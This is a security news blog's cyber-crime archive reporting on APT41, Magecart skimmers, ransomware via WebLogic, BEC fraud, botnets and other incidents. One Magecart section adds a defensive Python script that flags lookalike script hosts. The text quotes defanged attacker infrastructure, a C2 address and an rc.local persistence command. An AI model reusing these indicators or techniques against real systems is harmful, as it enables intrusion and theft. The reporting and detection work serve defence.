Category Archives: cyber crime

Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency

The Ukrainian Secret Service is investigating the case of employees at a nuclear power plant who connected its systems to the Internet to mine cryptocurrency.

The Ukrainian Secret Service (SBU) launched an investigation after employees at a local nuclear power plant connected some systems of the internal network to the Internet to mine cryptocurrency.

The incident was first reported by the Ukrainian news site UNIAN.

Nuclear power plants are critical infrastructure; an incident of this kind could potentially expose highly sensitive information.

The security incident happened in July at the South Ukraine Nuclear Power Plant in Yuzhnoukrainsk, in the south of the country.

On July 10, SBU agents raided the nuclear power plant and discovered the equipment used by the employees to mine cryptocurrency.

The equipment was found in the power plant’s administration offices.

The Ukrainian authorities are currently investigating whether any attackers may have used the exposed systems to access information that could threaten national security.

The SBU seized equipment consisting of two metal cases containing coolers and video cards (Radeon RX 470 GPUs), computer components commonly used in mining farms.

“Further, the SBU also found and seized additional equipment that looked like mining rigs in the building used as barracks by a military unit of the National Guard of Ukraine, tasked with guarding the power plant.” ZDNet reported.

The authorities have charged several employees, but at the time of writing none had been arrested.

In February 2018, a similar incident took place in Russia. Russian authorities arrested some employees at the Russian Federation Nuclear Center facility because they were suspected of trying to use a supercomputer at the plant to mine Bitcoin.

In April 2018, an employee at the Romanian National Research Institute for Nuclear Physics and Engineering abused the institute’s electrical network to mine cryptocurrency.

Pierluigi Paganini

(SecurityAffairs – nuclear power plant, hacking)

The post Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency appeared first on Security Affairs.

China-linked APT41 group targets US-Based Research University

Security experts at FireEye observed the Chinese APT41 group targeting a web server at a U.S.-based research university.

Experts at FireEye observed the China-linked APT41 group targeting a publicly accessible web server at a U.S.-based research university.

APT41 has been active since at least 2012 and has been involved in both state-sponsored espionage campaigns and financially motivated attacks since 2014. The group has hit entities in several industries, including gaming, healthcare, high-tech, higher education, telecommunications, and travel services.

Unlike other China-based actors, the group used custom malware in its cyber espionage operations; experts observed 46 different malware families and tools in APT41 campaigns.

“APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain.” states the report published by FireEye. “Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.”

FireEye experts published a detailed report on the evolution of the group’s tactics, techniques, and procedures (TTPs), and found overlaps with other known Chinese espionage operators such as BARIUM and the Winnti APT groups.

APT41 leverages several techniques to carry out the initial compromise, including spear phishing, moving laterally from trusted third parties, and using stolen credentials.

Experts observed APT41 using spear-phishing emails with attachments such as compiled HTML (.chm) files.

The group’s arsenal includes backdoors, credential stealers, keyloggers, and rootkits. APT41 has also leveraged TeamViewer to deploy its malware into compromised target environments.

The attack against a publicly accessible web server at a U.S.-based research university took place in April 2019. The hackers exploited the CVE-2019-3396 vulnerability in Atlassian Confluence Server to compromise the system and load additional payloads, including a variant of the China Chopper web shell.

The attackers then deployed two additional files, the HIGHNOON backdoor and a rootkit; within the next 35 minutes they used both the China Chopper web shell and the HIGHNOON backdoor to send commands to the compromised server.

“HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins.” reads the analysis published by FireEye.

Attackers used the HIGHNOON backdoor to execute a PowerShell command and download a script from the PowerSploit repository. The script appears to be a copy of the Invoke-Mimikatz post-exploitation tool, which reflectively loads Mimikatz 2.0 into memory.

The hackers also conducted additional reconnaissance and downloaded two additional files, representing the dropper and encrypted/compressed payload components of the ACEHASH malware. The ACEHASH malware is a credential stealer and password dumping utility.

In summary, the attackers exploited the vulnerability in the Confluence system to execute commands and deploy custom malware. Although the Mimikatz attempt failed, ACEHASH allowed them to harvest a single credential from the system. The good news is that FireEye successfully neutralized the attack.

Pierluigi Paganini

(SecurityAffairs – APT41, hacking)

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity issue can cause unexpected costs in several different areas. What is the cost of dealing with an attack in four industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that suffer wide-scale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The numbers of attacks on the financial industry are going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase of reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives industry-specific snapshots of cybersecurity costs associated with particular industries. But, even sectors that are not on this list should be concerned about potential losses. Many cybersecurity experts agree that the expenses of cyberattacks, in general, are steadily going up.

The expenses and effort required for resolution are also impacted by the growing complexity of cybercriminals’ tactics.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

Ransomware As A Tool – LockerGoga

Ransomware authors keep experimenting with the development of their payloads in various dimensions. In the timeline of ransomware implementations, we have seen its evolution from a simple screen locker to a multi-component model for file encryption, from a novice approach to a sophisticated one. Ransomware as a Tool has evolved in the wild…

Authorities shut down major darknet marketplaces: the Wall Street Market and Valhalla

German police have shut down one of the world’s largest black marketplaces on the dark web, the ‘Wall Street Market,’ and arrested its operators.

The German police, with the support of Europol, the Dutch police and the FBI, have shut down one of the world’s largest black marketplaces on the dark web, the ‘Wall Street Market,’ and arrested three operators allegedly running it. The three suspects, all German nationals, were arrested on April 23 and 24 in the states of Hesse, Baden-Wuerttemberg and North Rhine-Westphalia.

The operation also led to the arrest of two major suppliers of illegal narcotics in the United States.

The operation against the Wall Street Market started earlier this year after Finnish authorities also shut down another black marketplace, the Silkkitie market (aka the Valhalla marketplace). Many Finnish narcotics sellers moved to the Wall Street Market.

“The German Federal Criminal Police (Bundeskriminalamt) shut down the Wall Street Market, under the authority of the German Public Prosecutor’s office. They were supported by the Dutch National Police (Politie), Europol, Eurojust and various US government agencies (Drug Enforcement Administration, Federal Bureau of Investigation, Internal Revenue Service, Homeland Security Investigations, US Postal Inspection Service, and the US Department of Justice).” reads a press release published by the Europol.

“The Silkkitie (known as the Valhalla Marketplace) and its contents were also seized by Finnish Customs (Tulli) in close cooperation with the French National Police (La Police Nationale Française).”

The Wall Street Market was considered one of the most important points of aggregation in the cybercrime underground for trading cocaine, heroin, cannabis and amphetamines, as well as digital goods such as stolen data, malware, and fake documents.

The Tor-based marketplace had more than one million registered accounts, more than 5,000 registered sellers and more than 60,000 sales offers.

“The illegal platform was exclusively accessible via the Tor network in the so-called Darknet and aimed at international trade in criminal goods.” continues the Europol. “Most recently, more than 63 000 sales offers were placed on the online marketplace and more than 1 150 000 customer accounts and more than 5 400 sellers registered. For payment, the users of the online marketplace used the crypto currencies Bitcoin and Monero. The alleged marketplace officials are said to have received commission payments of 2 to 6 percent of the sales value for the settlement of illegal sales of the platform.”

The anonymity of payments was ensured by the use of the Bitcoin and Monero cryptocurrencies. It was a prolific business for the Wall Street Market operators, who kept a commission of two to six percent of the sales value.

The German authorities seized over €550 000 in cash and millions worth of cryptocurrencies; the police also seized several vehicles, as well as computers and data storage devices.

Behind this latest success against cybercrime is a dedicated Dark Web Team established by Europol, which works together with EU partners and law enforcement agencies across the globe.

The team delivers a complete, coordinated approach for:

  • sharing information;
  • providing operational support and expertise in different crime areas;
  • developing tools, tactics and techniques to conduct dark web investigations;
  • identifying threats and targets. 

“A shared commitment across the law enforcement community worldwide and a coordinated approach by law enforcement agencies has once again proved their effectiveness.” concludes the Europol. “The scale of the operation at Europol demonstrates the global commitment to tackling the use of the dark web as a means to commit crime.”

Pierluigi Paganini

(SecurityAffairs – Wall Street Market, hacking)

Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme

The US DoJ indicted a Russian national for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

The US DoJ indicted the Russian national Anton Bogdanov for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

Bogdanov was charged in federal court in Brooklyn with wire fraud conspiracy, aggravated identity theft and computer intrusion in connection with a scheme in which he and other crooks used stolen personal information to file federal tax returns and fraudulently obtain more than $1.5 million in tax refunds from the Internal Revenue Service.

The Russian man was arrested in Phuket, Thailand, on November 28, 2018 and was extradited to the United States in March 2019. 

“As alleged in the indictment, Bogdanov and his co-conspirators combined sophisticated computer hacking and identity theft with old-fashioned fraud to steal more than $1.5 million from the U.S. Treasury,” stated United States Attorney Donoghue.  “This Office, together with our law enforcement partners, will use all our available resources to target and bring cybercriminals to justice, wherever they are.”

According to the indictment, between June 2014 and November 2016, Anton Bogdanov and his co-conspirators compromised the computer systems of private tax preparation firms in the United States and stole victims’ personally identifiable information (PII), including Social Security numbers and dates of birth.

The crooks used the stolen data to impersonate the victims and modified the tax returns to ensure that the refunds were paid to prepaid debit cards under their control.

“Bogdanov and his co-conspirators also used misappropriated PII to obtain prior tax filings of victims from an IRS website, and filed new tax returns, purportedly on behalf of the victims, so that refunds were paid to prepaid debit cards under their control.” reads the press release published by the DoJ. “The debit cards were cashed out in the United States, and a percentage of the proceeds was wired to Bogdanov in Russia.”

[Image: Anton Bogdanov]

According to the investigators, the debit cards were cashed out in the United States, while Bogdanov received a percentage of the proceeds in Russia.

If convicted of the charges, Anton Bogdanov could face up to 27 years’ imprisonment.

Pierluigi Paganini

(SecurityAffairs – Anton Bogdanov, cybercrime)

Magecart Group 12 also targets Opencart-based online stores

Magecart is in the headlines again: Magecart Group 12 is conducting a large-scale operation that targets OpenCart online stores.

According to security experts at RiskIQ, the Magecart Group 12 is behind a large-scale operation against OpenCart online stores. The attackers used stealth tactics to remain under the radar and siphon payment data from compromised e-commerce sites.

Security firms have monitored the activities of a dozen Magecart groups since at least 2015. The gangs implant skimming scripts into compromised online stores in order to steal payment card data, but they differ considerably from one another.

According to a joint report published by RiskIQ and Flashpoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.

OpenCart is one of the most popular e-commerce platforms worldwide and is currently used by thousands of online stores of all sizes. As one of the top three e-commerce CMSs, after Shopify and Magento, it is unsurprising that crooks target it too.

Previous attacks carried out by Magecart Group 12 hit e-commerce services used by thousands of online stores running versions of Magento, OpenCart, and osCommerce. The attacks against OpenCart-based stores are similar to the Magento ones.

“We’ll also break down a large-scale Magecart Group 12 campaign uncovered by RiskIQ researchers abusing the OpenCart platform, which is run by thousands of e-commerce sites.” reads the analysis published by RiskIQ. “Group 12 breached OpenCart sites to inject their skimmer similar to the Magento attacks, starting with the insertion of a very well-picked domain name: batbing[.]com.”

In the latest wave of attacks, Magecart group 12 injected their skimmer into OpenCart websites only after checking if the visitor accessed a checkout page. Technically they added the following pre-filter JavaScript code:

[Image: Magecart Group 12 OpenCart pre-filter script]

Attackers used a domain name that attempts to impersonate the search engine script.

“One other notable element of this attack is the impersonation attempt for the search engine script:”

The normal Bing URL looks very similar:


RiskIQ, with the support of abuse.ch and the Shadowserver Foundation, took the domain used by the attackers offline.

Experts found references to the skimmer script in a forum post on the OpenCart forum.

RiskIQ experts believe that new types of web skimming attacks will be observed in the future: attackers will go beyond payment data and attempt to steal login credentials and other sensitive information.

“It’s likely that new breeds of these web skimming attacks will emerge in the future, whether by new or existing Magecart groups. They’re currently focusing on payment data, but we’re already seeing moves to skim login credentials and other sensitive information.” concludes RiskIQ. “This widens the scope of potential Magecart victims far beyond e-commerce alone.”
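The RiskIQ analysis above describes the skimmer as a script loaded from a lookalike domain (batbing[.]com imitating the Bing tag host) and injected only on checkout pages. The defensive counterpart is an inventory of every third-party script host a checkout page loads, checked against an allowlist, with unknown hosts flagged and near-misses of approved hosts called out as probable lookalikes. The Python below is an added example, not RiskIQ's or OpenCart's code; the checkout HTML, the allowlist and the `.test` hostnames are constructed for the demonstration, and `bat.bing.com` is assumed to be the legitimate Bing tag host the report contrasts with batbing[.]com.

```python
import re
from urllib.parse import urlparse

# Assumed allowlist: hosts the store operator has approved to serve scripts on checkout.
# bat.bing.com is assumed here to be the legitimate Bing tag host (constructed allowlist).
ALLOWED_HOSTS = {"bat.bing.com", "cdn.example-store.test"}

# Constructed checkout page: a first-party script, the legitimate Bing tag, the
# batbing[.]com lookalike named in the RiskIQ report, and an unrelated unknown host.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script type="text/javascript" src="/catalog/view/javascript/common.js"></script>
<script src="https://bat.bing.com/bat.js"></script>
<script src='https://batbing.com/bat.js'></script>
<script async src="//cdn.unknown-analytics.test/track.js"></script>
</head><body><form id="checkout"></form></body></html>
"""

SCRIPT_SRC_RE = re.compile(r"<script\b[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)


def script_hosts(html):
    """Hostnames of every external <script src=...>, in document order.
    Relative (same-origin) script paths have no host and are skipped."""
    hosts = []
    for src in SCRIPT_SRC_RE.findall(html):
        if src.startswith("//"):          # protocol-relative URL
            src = "https:" + src
        host = urlparse(src).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def levenshtein(a, b):
    """Edit distance between two strings (classic dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(host, allowed=ALLOWED_HOSTS, max_distance=2):
    """Return the allowed host that `host` imitates, or None.

    Two heuristics: a small edit distance to an allowed host (batbing.com is one
    deletion away from bat.bing.com), or a distinctive label of an allowed host
    (4+ characters, TLD excluded) embedded in the unknown host name."""
    for good in allowed:
        if levenshtein(host, good) <= max_distance:
            return good
        labels = [lab for lab in good.split(".")[:-1] if len(lab) >= 4]
        if any(lab in host for lab in labels):
            return good
    return None


def audit_scripts(html, allowed=ALLOWED_HOSTS):
    """Every script host not on the allowlist, with a verdict for each."""
    findings = []
    for host in script_hosts(html):
        if host in allowed:
            continue
        mimic = lookalike_of(host, allowed)
        verdict = f"lookalike of {mimic}" if mimic else "unknown host"
        findings.append({"host": host, "verdict": verdict})
    return findings


if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_CHECKOUT_HTML):
        print(f"{finding['host']:30} {finding['verdict']}")
```

Run against the constructed page, the audit reports `batbing.com` as a lookalike of `bat.bing.com` and `cdn.unknown-analytics.test` as an unknown host, while the first-party script and the approved Bing host pass. The same check can be run periodically against a store's live checkout page; any new host in the output is worth a look, since a skimmer that is only injected on checkout will not show up on a scan of the home page.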

Pierluigi Paganini

(SecurityAffairs – Magecart Group 12, OpenCart)

Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware

Threat actors are exploiting a recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations.

Threat actors are delivering a new piece of malware, tracked as Sodinokibi, by exploiting a recently patched Oracle WebLogic Server vulnerability.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology. The flaw initially received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

On April 26, Oracle addressed the flaw with the release of an out-of-band update.

The threat was detected and analyzed by several firms (including South Korea’s EST Security and Cisco Talos), independent researchers, and intelligence groups.

“Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10.” reads the analysis published by Cisco Talos. “Attackers have been making use of this exploit in the wild since at least April 17.”

[Image: Sodinokibi ransomware]

The crooks used PowerShell commands to download and execute malicious payloads, and demanded a ransom ranging from $1,500 up to $2,500 worth of Bitcoin. The ransom doubles if the victims do not pay within a specified number of days.

Talos started seeing the first stages of the Sodinokibi attacks — the attackers first looked for exploitable WebLogic servers —

Since April 25, one day before Oracle released security patches, the experts have observed Sodinokibi ransomware infections.

Talos also noted that threat actors were exploiting the flaw to deliver the popular Gandcrab ransomware.

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab,” continues Talos researchers.

Experts discovered that CVE-2019-2725 has also been exploited to deliver cryptocurrency miners and other types of malware. Researchers believe it has also likely been exploited in targeted attacks.

“Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725.” concludes Talos.

Pierluigi Paganini

(SecurityAffairs – Sodinokibi ransomware, WebLogic)

Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack

Crooks have stolen $1.75 million in a church BEC (Business Email Compromise) attack, the victim is the Saint Ambrose Catholic Parish.

Cybercriminals have stolen $1.75 million in a BEC (Business Email Compromise) attack against the Saint Ambrose Catholic Parish.

Saint Ambrose is the second largest church in the Diocese of Cleveland and the largest church in Brunswick, Ohio.

The Saint Ambrose Catholic Parish discovered the BEC attack on April 17, when it learned that payments it had made for its Vision 2020 project had never been received by the contractor (Marous Brothers Construction).

According to the investigation conducted by the FBI and Brunswick police, hackers broke into the parish’s email system, likely via a phishing attack. Attackers were able to trick the personnel into believing that the contractor had changed their bank, and asked them to transfer the funds to a new bank account under their control.

In a letter to the parish, Fr. Bob Stec explained that he was contacted by the contractor, which informed him that it had not received the payments for the past two months.

“On Wednesday, Marous Brothers called inquiring as to why we had not paid our monthly payment on the project for the past two months totaling approximately $1,750,000.” reads the letter sent to the parish by Pastor Father Bob Stec.

“This was shocking news to us, as we have been very prompt on our payments every month and have received all the appropriate confirmations from the bank that the wire transfers of money to Marous were executed/confirmed.”

According to Stec, the crooks accessed two St. Ambrose employees’ email accounts. The attackers compromised only the email system; they did not access the parish database, which is stored in a secure cloud-based system.

“We are working closely with the Diocese and its insurance program to file a claim in the hopes that Marous Brothers Construction can receive their payment quickly and we can bring this important project for our parish to a positive completion,” Stec said in the letter.

The parish submitted an insurance claim in an attempt to recover the stolen money.

“At the same time, we brought in information technology consultants to review the security and stability of our system, change all passwords, and verify the integrity of our databases and other pertinent information.” Stec added. “They have determined the breach was limited to only two email accounts.”

BEC attacks represent a serious threat for businesses: according to the recently released 2018 Internet Crime Report by the FBI’s Internet Crime Complaint Center (IC3), BEC scams generated $1.2 billion in profits.

“In 2018, the IC3 received 20,373 BEC/E-mail Account Compromise (EAC) complaints with adjusted losses of over $1.2 billion” reads the report.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

ElectrumDoSMiner botnet reached 152,000 hosts

Researchers at Malwarebytes are monitoring the evolution of the ElectrumDoSMiner DDoS botnet that reached 152,000 infected hosts.

Malwarebytes researchers are closely monitoring attacks against users of the popular Electrum Bitcoin wallet, in particular the evolution of the Electrum DDoS botnet.

In mid-April, experts at Malwarebytes published a report warning of cyber attacks against users of the popular Electrum Bitcoin wallet. According to the experts, the crooks had already netted over 771 Bitcoins, an amount equivalent to approximately $4 million USD at the exchange rates of the time.

Since that analysis, the cyber criminals have stolen further funds, bringing the total to USD $4.6 million, but the most concerning aspect of the story is that the botnet they use continues to grow. On April 24, the botnet was composed of fewer than 100,000 bots, but the next day the number peaked at 152,000.

“Since our last blog, the amount of stolen funds has increased to USD $4.6 million, and the botnet that is flooding the Electrum infrastructure is rapidly growing.” reads the analysis published by Malwarebytes. “Case in point, on April 24, the number of infected machines in the botnet was just below 100,000 and the next day it reached its highest at 152,000, according to this online tracker. Since then, it has gone up and down and plateaued at around the 100,000 mark.”

The experts had already observed two malware campaigns, leveraging the RIG exploit kit and Smoke Loader respectively, to deliver the ElectrumDoSMiner.

Malwarebytes also detected a previously undocumented loader, tracked as Trojan.BeamWinHTTP, that was used by the crooks to deliver the ElectrumDoSMiner (transactionservices.exe).

The experts believe that there are many more infection vectors beyond the loaders they have discovered.

Most of the ElectrumDoSMiner infections were observed in the Asia-Pacific region (APAC), Brazil and Peru.

“The number of victims that are part of this botnet is constantly changing. We believe as some machines get cleaned up, new ones are getting infected and joining the others to perform DoS attacks.” continues the report. “Malwarebytes detects and removes ElectrumDoSMiner infections on more than 2,000 endpoints daily.”

Further technical details, including Indicators of Compromise (IoCs), are reported in the analysis published by Malwarebytes.

Pierluigi Paganini

(SecurityAffairs – ElectrumDoSMiner, botnet)

New Emotet variant uses connected devices as proxy C2 servers

Researchers at Trend Micro have uncovered a malware campaign distributing a new Emotet Trojan variant that compromises devices and uses them as Proxy C2 servers.

Trend Micro discovered a new variant of the Emotet Trojan that is able to infect devices and use them as proxy command-and-control servers. The new variant also employs random URI directory paths to evade network-based detection rules.

“Recently, an analysis of Emotet traffic has revealed that new samples use a different POST-infection traffic than previous versions.” reads the analysis published by Trend Micro. “It is also attempting to use compromised connected devices as proxy command and control (C&C) servers that redirect to the real Emotet C&Cs. These changes may seem trivial at first, but the added complexity in command and control traffic is an attempt by Emotet authors to evade detection.”

The experts also noticed that the threat actors behind the latest Emotet campaign are actively attempting to compromise IoT devices, including routers, IP cameras and webcams, and to recruit them as a first layer of the C2 infrastructure.

The compromised devices could be used by threat actors for other malicious purposes.

Emotet is delivered via spam campaigns; one of the attacks monitored in early April leveraged the Powload trojan downloader to drop the threat. The spam emails carry a malicious ZIP file that can be opened with a 4-digit password included in the body of the email. The archive contains variants of Powload that use PowerShell to download an executable, the final Emotet payload.


Since March 15, the experts have monitored Emotet samples that use the new post-infection traffic and found that they also use randomly generated URI directory paths in their POST requests to evade network-based detection.

The new Emotet version sends the stolen information within the HTTP POST message body instead of using the Cookie header. Like previous versions, it encrypts the data with an RSA key and AES, and encodes it in Base64.


“The change in POST-infection traffic and the use of these connected devices show that Emotet is still a constantly evolving and resilient threat.” concludes Trend Micro.

“The malware authors are fine-tuning evasion techniques and trying to adapt to security solutions. If left unchecked and undetected, this threat may lead to a substantial loss of money and data for businesses.”

Pierluigi Paganini

(SecurityAffairs – cybercrime, malware)

The post New Emotet variant uses connected devices as proxy C2 servers appeared first on Security Affairs.

Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader

Experts observed several malspam campaigns using signed emails to deliver the GootKit banking Trojan (aka talalpek or Xswkit).

Threat actors leverage a multi-stage malware loader tracked as JasperLoader in the malspam campaigns over the past few months.

The JasperLoader was observed while distributing malware to targets from Central Europe, most of them in Italy and Germany.

The Gootkit banking Trojan was previously distributed by DanaBot, the Neutrino exploit kit, and Emotet.

“Specifically, we’re tracking a loader known as “JasperLoader,” which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy.” reads the analysis published by Cisco Talos. “JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult.”

JasperLoader uses a multi-stage infection process that implements several obfuscation techniques to avoid detection. According to Cisco Talos experts, the loader was designed with resiliency and flexibility in mind.

The malspam campaigns detected by Cisco Talos that hit European countries use weaponized attachments containing either a Visual Basic (VBS) script or a DOCM document with VBA macros.


Talos experts also noticed spam messages containing malicious JS downloaders.

The latest malspam campaigns observed by Talos use message signing to confirm the authenticity of the sender.

“Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.” continues the analysis of the researchers.

The campaigns that targeted Italian users leverage legitimate certified email services such as Posta Elettronica Certificata (PEC).

“The choice to abuse certified email services such as PEC demonstrates that attackers are always looking for new ways to lend credibility to their social engineering attacks.” continues Cisco Talos.

“In this case, abusing a legitimate email service allowed them to deliver their malicious emails in a way that would maximize the likelihood that a potential victim would open the attachments and infect themselves with JasperLoader.”

The JasperLoader malware loader is used by threat actors to check the target's geolocation and determine whether the machine is in one of the countries targeted in the malspam campaign (i.e. Russia, Ukraine, Belarus, or the People's Republic of China).

Experts observed that the malware gains persistence by adding an LNK shortcut to itself in the Startup folder, so that the malware is launched every time the system is rebooted.

JasperLoader is used by threat actors to update the loader itself, to run PowerShell scripts, and, of course, to deliver the final Gootkit malware payload.

Further technical details, such as Indicators of compromise (IOCs), are included in the analysis published by Talos.

Pierluigi Paganini

(SecurityAffairs – malspam campaigns, JasperLoader)

The post Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader appeared first on Security Affairs.

AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server

A new variant of the AESDDoS bot is exploiting a recent vulnerability in the Atlassian collaborative software Confluence.

Security experts at Trend Micro have spotted a new variant of AESDDoS botnet that is exploiting a recently discovered vulnerability in the Atlassian collaborative software Confluence.

The flaw exploited in the attacks, tracked as CVE-2019-3396, is a server-side template injection vulnerability that resides in the Widget Connector macro in Confluence Server.

Threat actors leverage the vulnerability to install distributed denial-of-service (DDoS) malware and cryptocurrency miners, and to remotely execute code.

“In our analysis, we saw that an attacker was able to exploit CVE-2019-3396 to infect machines with the AESDDoS botnet malware.” reads the analysis published by Trend Micro. “A shell command was remotely executed to download and execute a malicious shell script (Trojan.SH.LODEX.J), which in turn downloaded another shell script (Trojan.SH.DOGOLOAD.J) that finally installed the AESDDoS botnet malware on the affected system.”

The AESDDoS bot involved in the recent attacks has the ability to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The malware also connects to 23[.]224[.]59[.]34:48080 to send and receive remote shell commands from the attacker.

Once the malware has infected a system, it can gather system information, including model ID and CPU description, speed, family, model, and type.

The AESDDoS bot uses the AES algorithm to encrypt gathered data and data received from the C2 server.

Trend Micro researchers also discovered that the latest variant of the AESDDoS bot can modify the files /etc/rc.local and /etc/rc.d/rc.local as an autostart technique, appending the command "{malware path}/{malware file name} reboot" to them.

Atlassian has already addressed the vulnerability in the Confluence software with the release of the version 6.15.1.

“Since the successful exploitation of CVE-2019-3396 in Atlassian Confluence Server can put resources at risk, enterprises should be able to identify vulnerabilities, make use of the latest threat intelligence against malware or exploits, and detect modifications to the application’s design and the underlying infrastructure that hosts it,” Trend Micro concludes.

Pierluigi Paganini

(SecurityAffairs – AESDDoS bot, DDoS)

The post AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server appeared first on Security Affairs.

Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites

Security experts discovered, hosted on GitHub, the skimmer scripts used by the Magecart cybercrime gang to compromise Magento installations worldwide.

Experts discovered the Magecart skimmer scripts used to compromise a few hundred e-commerce websites worldwide hosted on GitHub.

Security firms have monitored the activities of a dozen Magecart groups since at least 2015. The gangs implant skimming scripts into compromised online stores in order to steal payment card data, but they are quite different from each other.

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of Magecart groups is long and includes several major platforms such as British Airways, Newegg, Ticketmaster, and Feedify.

In early April, the security firm Group-IB issued a new comprehensive report on the analysis of JavaScript-sniffers, a type of malware designed to steal customer payment data from online stores. Group-IB researchers analyzed 2,440 infected e-commerce websites with a total of around 1.5 million unique daily visitors whose data could have been compromised.

Experts at MalwareBytes discovered a MageCart skimmer script hosted on GitHub that was uploaded on April 20 and quickly removed by the platform after the experts reported the discovery to the company.

“This latest skimmer is a hex-encoded piece of JavaScript code that was uploaded to GitHub on April 20 by user momo33333, who, as it happens, had just joined the platform on that day as well.” reads the analysis published by MalwareBytes.


The script was uploaded to GitHub by the user ‘momo33333’, who had registered on the platform the same day.

